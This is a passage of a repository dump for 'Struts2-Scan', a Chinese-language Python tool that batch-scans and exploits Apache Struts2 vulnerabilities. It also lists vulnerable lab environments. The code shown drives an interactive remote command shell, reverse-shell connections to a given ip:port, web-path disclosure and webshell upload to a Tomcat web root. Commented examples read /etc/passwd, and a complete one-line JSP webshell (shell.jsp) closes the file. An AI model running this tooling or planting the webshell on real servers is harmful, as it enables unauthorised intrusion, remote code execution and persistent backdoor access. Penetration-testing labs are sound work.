1403 | / ___|| |_ _ __ _   _| |_ ___|___ \  / ___|  ___ __ _ _ __  
1404 | \___ \| __| '__| | | | __/ __| __) | \___ \ / __/ _` | '_ \ 
1405 |  ___) | |_| |  | |_| | |_\__ \/ __/   ___) | (_| (_| | | | |
1406 | |____/ \__|_|   \__,_|\__|___/_____| |____/ \___\__,_|_| |_|
1407 | 
1408 |                                       Author By HatBoy        
1409 | """
1410 | 
1411 | 
1412 | def show_info():
1413 |     """漏洞详情介绍"""
1414 |     click.secho("[+] 支持如下Struts2漏洞:", fg='red')
1415 |     for k, v in s2_dict.items():
1416 |         click.secho(v.info, fg='green')
1417 | 
1418 | 
1419 | def check_one(s):
1420 |     """检测单个漏洞"""
1421 |     result = s.check()
1422 |     return result
1423 | 
1424 | 
1425 | def scan_one(url, data=None, headers=None, encoding="UTF-8"):
1426 |     """扫描单个URL漏洞"""
1427 |     click.secho('[+] 正在扫描URL:' + url, fg='green')
1428 |     ss = [s(url, data, headers, encoding) for s in s2_list]
1429 |     with futures.ThreadPoolExecutor(max_workers=10) as executor:
1430 |         results = list(executor.map(check_one, ss))
1431 |     results = {r for r in results if r}
1432 |     click.secho('[*] ----------------results------------------'.format(url=url), fg='green')
1433 |     if (not results) and (not is_quiet):
1434 |         click.secho('[*] {url} 未发现漏洞'.format(url=url), fg='red')
1435 |     for r in results:
1436 |         if r.startswith("ERROR:"):
1437 |             click.secho('[ERROR] {url} 访问出错: {error}'.format(url=url, error=r[6:]), fg='red')
1438 |         else:
1439 |             click.secho('[*] {url} 存在漏洞: {name}'.format(url=url, name=r), fg='red')
1440 | 
1441 | 
1442 | def scan_more(urls, data=None, headers=None, encoding="UTF-8"):
1443 |     """批量扫描URL"""
1444 |     scan = partial(scan_one, data=data, headers=headers, encoding=encoding)
1445 |     with futures.ProcessPoolExecutor(max_workers=process) as executor:
1446 |         results = list(executor.map(scan, urls))
1447 | 
1448 | 
1449 | CONTEXT_SETTINGS = dict(help_option_names=['-h', '--help'])
1450 | 
1451 | 
1452 | @click.command(context_settings=CONTEXT_SETTINGS)
1453 | @click.option('-i', '--info', is_flag=True, help="漏洞信息介绍")
1454 | @click.option('-v', '--version', is_flag=True, help="显示工具版本")
1455 | @click.option('-u', '--url', help="URL地址")
1456 | @click.option('-n', '--name', help="指定漏洞名称, 漏洞名称详见info")
1457 | @click.option('-f', '--file', help="批量扫描URL文件, 一行一个URL")
1458 | @click.option('-d', '--data', help="POST参数, 需要使用的payload使用{exp}填充, 如: name=test&passwd={exp}")
1459 | @click.option('-c', '--encode', default="UTF-8", help="页面编码, 默认UTF-8编码")
1460 | @click.option('-p', '--proxy', help="HTTP代理. 格式为http://ip:port")
1461 | @click.option('-t', '--timeout', help="HTTP超时时间, 默认10s")
1462 | @click.option('-w', '--workers', help="批量扫描进程数, 默认为10个进程")
1463 | @click.option('--header', help="HTTP请求头, 格式为: key1=value1&key2=value2")
1464 | @click.option('-e', '--exec', is_flag=True, help="进入命令执行shell")
1465 | @click.option('--webpath', is_flag=True, help="获取WEB路径")
1466 | @click.option('-r', '--reverse', help="反弹shell地址, 格式为ip:port")
1467 | @click.option('--upfile', help="需要上传的文件路径和名称")
1468 | @click.option('--uppath', help="上传的目录和名称, 如: /usr/local/tomcat/webapps/ROOT/shell.jsp")
1469 | @click.option('-q', '--quiet', is_flag=True, help="关闭打印不存在漏洞的输出，只保留存在漏洞的输出")
1470 | def main(info, version, url, file, name, data, header, encode, proxy, exec, reverse, upfile, uppath, quiet, timeout,
1471 |          workers, webpath):
1472 |     """Struts2批量扫描利用工具"""
1473 |     global proxies, is_quiet, _tiemout, process
1474 |     click.secho(banner, fg='red')
1475 |     if not encode:
1476 |         encode = 'UTF-8'
1477 |     if info:
1478 |         show_info()
1479 |         exit(0)
1480 |     if version:
1481 |         click.secho("[+] Struts2 Scan V0.1", fg='green')
1482 |         exit(0)
1483 |     if proxy:
1484 |         proxies = {
1485 |             "http": proxy,
1486 |             "https": proxy
1487 |         }
1488 |     if quiet:
1489 |         is_quiet = True
1490 |     if timeout and check_int('timeout', timeout):
1491 |         _tiemout = check_int('timeout', timeout)
1492 |     if workers and check_int('workers', workers):
1493 |         process = check_int('workers', workers)
1494 |     if url and not name:
1495 |         scan_one(url, data, header, encode)
1496 |     if file:
1497 |         urls = read_urls(file)
1498 |         scan_more(urls, data, header, encode)
1499 |     if name and url:
1500 |         # 指定漏洞利用
1501 |         name = name.upper().replace('-', '_')
1502 |         if name not in s2_list:
1503 |             click.secho("[ERROR] 暂不支持{name}漏洞利用".format(name=name), fg="red")
1504 |             exit(0)
1505 |         s = s2_dict[name](url, data, header, encode)
1506 |         s.check()
1507 |         if not s.is_vul:
1508 |             click.secho("[ERROR] 该URL不存在{name}漏洞".format(name=name), fg="red")
1509 |         if webpath:
1510 |             if name in webpath_names:
1511 |                 web_path = s.get_path()
1512 |                 click.secho("[*] {webpath}".format(webpath=web_path), fg="red")
1513 |                 exit(0)
1514 |             else:
1515 |                 click.secho("[ERROR] 漏洞{name}不支持获取WEB路径".format(name=name), fg="red")
1516 |                 exit(0)
1517 |         if reverse:
1518 |             if name in reverse_names:
1519 |                 click.secho("[*] 请在反弹地址处监听端口如: nc -lvvp 8080", fg="red")
1520 |                 if ':' not in reverse:
1521 |                     click.secho("[ERROR] reverse反弹地址格式不对,正确格式为: 192.168.1.10:8080", fg="red")
1522 |                 ip = reverse.split(':')[0].strip()
1523 |                 port = reverse.split(':')[1].strip()
1524 |                 s.reverse_shell(ip, port)
1525 |                 exit(0)
1526 |             else:
1527 |                 click.secho("[ERROR] 漏洞{name}不支持反弹shell".format(name=name), fg="red")
1528 |                 exit(0)
1529 |         if upfile and uppath:
1530 |             if name in upload_names and check_file(upfile):
1531 |                 result = s.upload_shell(uppath, upfile)
1532 |                 if result is True:
1533 |                     click.secho("[+] 文件上传成功!", fg="green")
1534 |                     exit(0)
1535 |                 elif str(result).startswith("ERROR:"):
1536 |                     click.secho("[ERROR] 文件上传失败! {error}".format(error=result[6:]), fg="red")
1537 |                     exit(0)
1538 |                 else:
1539 |                     click.secho("[ERROR] 文件上传失败! \n{error}".format(error=result), fg="red")
1540 |                     exit(0)
1541 |             else:
1542 |                 click.secho("[ERROR] 漏洞{name}不支持文件上传".format(name=name), fg="red")
1543 |                 exit(0)
1544 |         if exec:
1545 |             if name in exec_names:
1546 |                 if name == "S2_052":
1547 |                     click.secho("[+] 提示: S2_052命令执行无回显，可将结果写入文件访问", fg='red')
1548 |                 while True:
1549 |                     cmd = input('>>>')
1550 |                     result = s.exec_cmd(cmd)
1551 |                     click.secho(result, fg='red')
1552 |             else:
1553 |                 click.secho("[ERROR] 漏洞{name}不支持命令执行".format(name=name), fg="red")
1554 |                 exit(0)
1555 |         click.secho(s.info, fg='green')
1556 |         exit(0)
1557 | 
1558 | 
1559 | if __name__ == '__main__':
1560 |     try:
1561 |         main()
1562 |     except KeyboardInterrupt as e:
1563 |         exit(0)
1564 |     except Exception as e:
1565 |         click.secho("[ERROR] {error}".format(error=e), fg='red')
1566 |         exit(0)
1567 | 
1568 | # s = S2_001("http://192.168.100.8:8080/login.action")
1569 | # print(s.info)
1570 | # print(s.check())
1571 | # print(s.get_path())
1572 | # print(s.exec_cmd('ls -al'))
1573 | # s.reverse_shell('192.168.100.8', '8888')
1574 | 
1575 | 
1576 | # s =  S2_003("http://192.168.100.8:8080/showcase.action")
1577 | # print(s.check())
1578 | # print(s.exec_cmd('ls -la'))
1579 | 
1580 | # s = S2_005("http://192.168.100.8:8080/example/HelloWorld.action")
1581 | # print(s.check())
1582 | # print(s.get_path())
1583 | # print(s.exec_cmd('ls -al'))
1584 | 
1585 | 
1586 | # s = S2_007("http://192.168.100.8:8080/user.action", "name=admin&email=admin&age={exp}")
1587 | # s.check()
1588 | # print(s.exec_cmd('ls -la'))
1589 | # s.reverse_shell('192.168.100.8', '8888')
1590 | 
1591 | # s = S2_008("http://192.168.100.8:8080")
1592 | # s.check()
1593 | # print(s.exec_cmd('ls -la'))
1594 | # s.reverse_shell('192.168.100.8', '8888')
1595 | 
1596 | # s = S2_009("http://192.168.100.8:8080/ajax/example5.action?age=123", "name")
1597 | # s.check()
1598 | # print(s.exec_cmd('ls -la'))
1599 | # s.reverse_shell('192.168.100.8', '8888')
1600 | 
1601 | # s = S2_012("http://192.168.100.8:8080/S2-012/user.action?name=")
1602 | # s.check()
1603 | # print(s.exec_cmd('ls -la'))
1604 | # s.reverse_shell('192.168.100.8', '8888')
1605 | 
1606 | # s = S2_013("http://192.168.100.8:8080/S2-013/link.action")
1607 | # s.check()
1608 | # print(s.get_path())
1609 | # print(s.exec_cmd('ls -la'))
1610 | # s.reverse_shell('192.168.100.8', '8888')
1611 | # print(s.upload_shell('/usr/local/tomcat/webapps/ROOT/shell.jsp', 'shell.jsp'))
1612 | 
1613 | # s = S2_015("http://192.168.100.8:8080/param.action")
1614 | # s.check()
1615 | # print(s.exec_cmd('ls -la'))
1616 | # s.reverse_shell('192.168.100.8', '8888')
1617 | 
1618 | # s = S2_016("http://192.168.100.8:8080/index.action")
1619 | # s.check()
1620 | # print(s.get_path())
1621 | # print(s.exec_cmd('ls -la'))
1622 | # s.reverse_shell('192.168.100.8', '8888')
1623 | # print(s.exec_cmd1('ls -la'))
1624 | # print('---------------------')
1625 | # print(s.exec_cmd2('ls -la'))
1626 | # print('---------------------')
1627 | # print(s.exec_cmd3('ls -la'))
1628 | # print(s.upload_shell1('/usr/local/tomcat/webapps/ROOT/shell.jsp', 'shell.jsp'))
1629 | # print(s.upload_shell('/usr/local/tomcat/webapps/ROOT/shell.jsp', 'shell.jsp'))
1630 | 
1631 | 
1632 | # s = S2_019("http://192.168.100.8:8080/example/HelloWorld.action")
1633 | # print(s.get_path())
1634 | # s.check()
1635 | # print(s.exec_cmd('ls -la'))
1636 | # s.reverse_shell('192.168.100.8', '8888')
1637 | # print(s.upload_shell('/usr/local/tomcat/webapps/ROOT/shell.jsp', 'shell.jsp'))
1638 | 
1639 | 
1640 | # s = S2_029("http://192.168.100.8/default.action")
1641 | # s.check()
1642 | # print(s.exec_cmd('ls -la'))
1643 | # s.reverse_shell('192.168.100.8', '8888')
1644 | 
1645 | 
1646 | # s = S2_032("http://192.168.100.8:8080/index.action")
1647 | # s.check()
1648 | # print(s.exec_cmd('ls -la'))
1649 | # print(s.get_path())
1650 | # s.reverse_shell('192.168.100.8', '8888')
1651 | 
1652 | 
1653 | # s = S2_033("http://192.168.100.8/orders/3")
1654 | # s.check()
1655 | # print(s.exec_cmd('ls -la'))
1656 | # s.reverse_shell('192.168.100.8', '8888')
1657 | 
1658 | 
1659 | # s = S2_037("http://192.168.100.8:8080/orders/3/")
1660 | # s.check()
1661 | # print(s.exec_cmd('ls -la'))
1662 | # print(s.get_path())
1663 | # s.reverse_shell('192.168.100.8', '8888')
1664 | 
1665 | 
1666 | # s = S2_045("http://192.168.100.8/memoshow.action")
1667 | # s.check()
1668 | # print(s.get_path())
1669 | # print(s.exec_cmd('ls -la'))
1670 | # s.reverse_shell('192.168.100.8', '8888')
1671 | # print(s.upload_shell('/usr/local/tomcat/webapps/ROOT/shell.jsp', 'shell.jsp'))
1672 | 
1673 | 
1674 | # s = S2_046("http://192.168.100.8/doUpload.action")
1675 | # s.check()
1676 | # print(s.get_path())
1677 | # print(s.exec_cmd('ls -la'))
1678 | # s.reverse_shell('192.168.100.8', '8888')
1679 | # print(s.upload_shell('/usr/local/tomcat/webapps/ROOT/shell.jsp', 'shell.jsp'))
1680 | 
1681 | # s = S2_052('http://192.168.100.8/orders/3/edit')
1682 | # s.reverse_shell('192.168.100.8', '8888')
1683 | 
1684 | # s = S2_048("http://192.168.100.8/integration/saveGangster.action", data='name={exp}&age=123&__checkbox_bustedBefore=true&description=123')
1685 | # s.check()
1686 | # print(s.exec_cmd('ls -la'))
1687 | # s.reverse_shell('192.168.100.8', '8888')
1688 | 
1689 | # s = S2_048("http://192.168.100.8/integration/saveGangster.action", data='name={exp}&age=123&__checkbox_bustedBefore=true&description=123')
1690 | # s.check()
1691 | # print(s.exec_cmd('ls -la'))
1692 | # s.reverse_shell('192.168.100.8', '8888')
1693 | 
1694 | # s = S2_053("http://192.168.100.8", data='name={exp}')
1695 | # s.check()
1696 | # print(s.exec_cmd('ls -la'))
1697 | # s.reverse_shell('192.168.100.8', '8888')
1698 | 
1699 | # s = S2_devMode("http://192.168.100.8/orders")
1700 | # print(s.get_path())
1701 | # print(s.exec_cmd('ls -la'))
1702 | # s.reverse_shell('192.168.100.8', '8888')
1703 | 
1704 | # s = S2_057("http://192.168.100.8:8080/showcase/actionChain1.action")
1705 | # print(s.check())
1706 | # print(s.exec_cmd("cat /etc/passwd"))
1707 | # s.reverse_shell("192.168.100.8", 9999)
1708 | 


--------------------------------------------------------------------------------
/Struts2环境/S2-001.war:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/HatBoy/Struts2-Scan/a96e748a836c7a094ee7c68403d04d3ce8a9b60d/Struts2环境/S2-001.war


--------------------------------------------------------------------------------
/Struts2环境/S2-003.war:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/HatBoy/Struts2-Scan/a96e748a836c7a094ee7c68403d04d3ce8a9b60d/Struts2环境/S2-003.war


--------------------------------------------------------------------------------
/Struts2环境/S2-005.war:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/HatBoy/Struts2-Scan/a96e748a836c7a094ee7c68403d04d3ce8a9b60d/Struts2环境/S2-005.war


--------------------------------------------------------------------------------
/Struts2环境/S2-005_2.war:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/HatBoy/Struts2-Scan/a96e748a836c7a094ee7c68403d04d3ce8a9b60d/Struts2环境/S2-005_2.war


--------------------------------------------------------------------------------
/Struts2环境/S2-007.war:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/HatBoy/Struts2-Scan/a96e748a836c7a094ee7c68403d04d3ce8a9b60d/Struts2环境/S2-007.war


--------------------------------------------------------------------------------
/Struts2环境/S2-008.war:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/HatBoy/Struts2-Scan/a96e748a836c7a094ee7c68403d04d3ce8a9b60d/Struts2环境/S2-008.war


--------------------------------------------------------------------------------
/Struts2环境/S2-009.war:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/HatBoy/Struts2-Scan/a96e748a836c7a094ee7c68403d04d3ce8a9b60d/Struts2环境/S2-009.war


--------------------------------------------------------------------------------
/Struts2环境/S2-012.war:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/HatBoy/Struts2-Scan/a96e748a836c7a094ee7c68403d04d3ce8a9b60d/Struts2环境/S2-012.war


--------------------------------------------------------------------------------
/Struts2环境/S2-013.war:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/HatBoy/Struts2-Scan/a96e748a836c7a094ee7c68403d04d3ce8a9b60d/Struts2环境/S2-013.war


--------------------------------------------------------------------------------
/Struts2环境/S2-015.war:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/HatBoy/Struts2-Scan/a96e748a836c7a094ee7c68403d04d3ce8a9b60d/Struts2环境/S2-015.war


--------------------------------------------------------------------------------
/Struts2环境/S2-016.war:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/HatBoy/Struts2-Scan/a96e748a836c7a094ee7c68403d04d3ce8a9b60d/Struts2环境/S2-016.war


--------------------------------------------------------------------------------
/Struts2环境/S2-019.war:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/HatBoy/Struts2-Scan/a96e748a836c7a094ee7c68403d04d3ce8a9b60d/Struts2环境/S2-019.war


--------------------------------------------------------------------------------
/Struts2环境/S2-032.war:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/HatBoy/Struts2-Scan/a96e748a836c7a094ee7c68403d04d3ce8a9b60d/Struts2环境/S2-032.war


--------------------------------------------------------------------------------
/Struts2环境/S2-037.war:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/HatBoy/Struts2-Scan/a96e748a836c7a094ee7c68403d04d3ce8a9b60d/Struts2环境/S2-037.war


--------------------------------------------------------------------------------
/Struts2环境/S2-045.war:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/HatBoy/Struts2-Scan/a96e748a836c7a094ee7c68403d04d3ce8a9b60d/Struts2环境/S2-045.war


--------------------------------------------------------------------------------
/Struts2环境/其他环境.txt:
--------------------------------------------------------------------------------
 1 | S2-029:
 2 | $ docker pull medicean/vulapps:s_struts2_s2-029
 3 | $ docker run -d -p 80:8080 medicean/vulapps:s_struts2_s2-029
 4 | 
 5 | S2-033:
 6 | $ docker pull medicean/vulapps:s_struts2_s2-033
 7 | $ docker run -d -p 80:8080 medicean/vulapps:s_struts2_s2-033
 8 | 
 9 | S2-045:
10 | $ docker pull medicean/vulapps:s_struts2_s2-045
11 | $ docker run -d -p 80:8080 medicean/vulapps:s_struts2_s2-045
12 | 
13 | S2-046:
14 | $ docker pull medicean/vulapps:s_struts2_s2-046
15 | $ docker run -d -p 80:8080 medicean/vulapps:s_struts2_s2-046
16 | 
17 | 
18 | S2-048:
19 | $ docker pull medicean/vulapps:s_struts2_s2-048
20 | $ docker run -d -p 80:8080 medicean/vulapps:s_struts2_s2-048
21 | 
22 | S2-052:
23 | $ docker pull medicean/vulapps:s_struts2_s2-052
24 | $ docker run -d -p 80:8080 medicean/vulapps:s_struts2_s2-052
25 | 
26 | 
27 | S2-devMode:
28 | $ docker pull medicean/vulapps:s_struts2_s2-devmode
29 | $ docker run -d -p 80:8080 medicean/vulapps:s_struts2_s2-devmode
30 | 
31 | S2-057:
32 | https://github.com/vulhub/vulhub/tree/master/struts2/s2-057
33 | 


--------------------------------------------------------------------------------
/shell.jsp:
--------------------------------------------------------------------------------
1 | <%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%><a href="One_OK"></a>


--------------------------------------------------------------------------------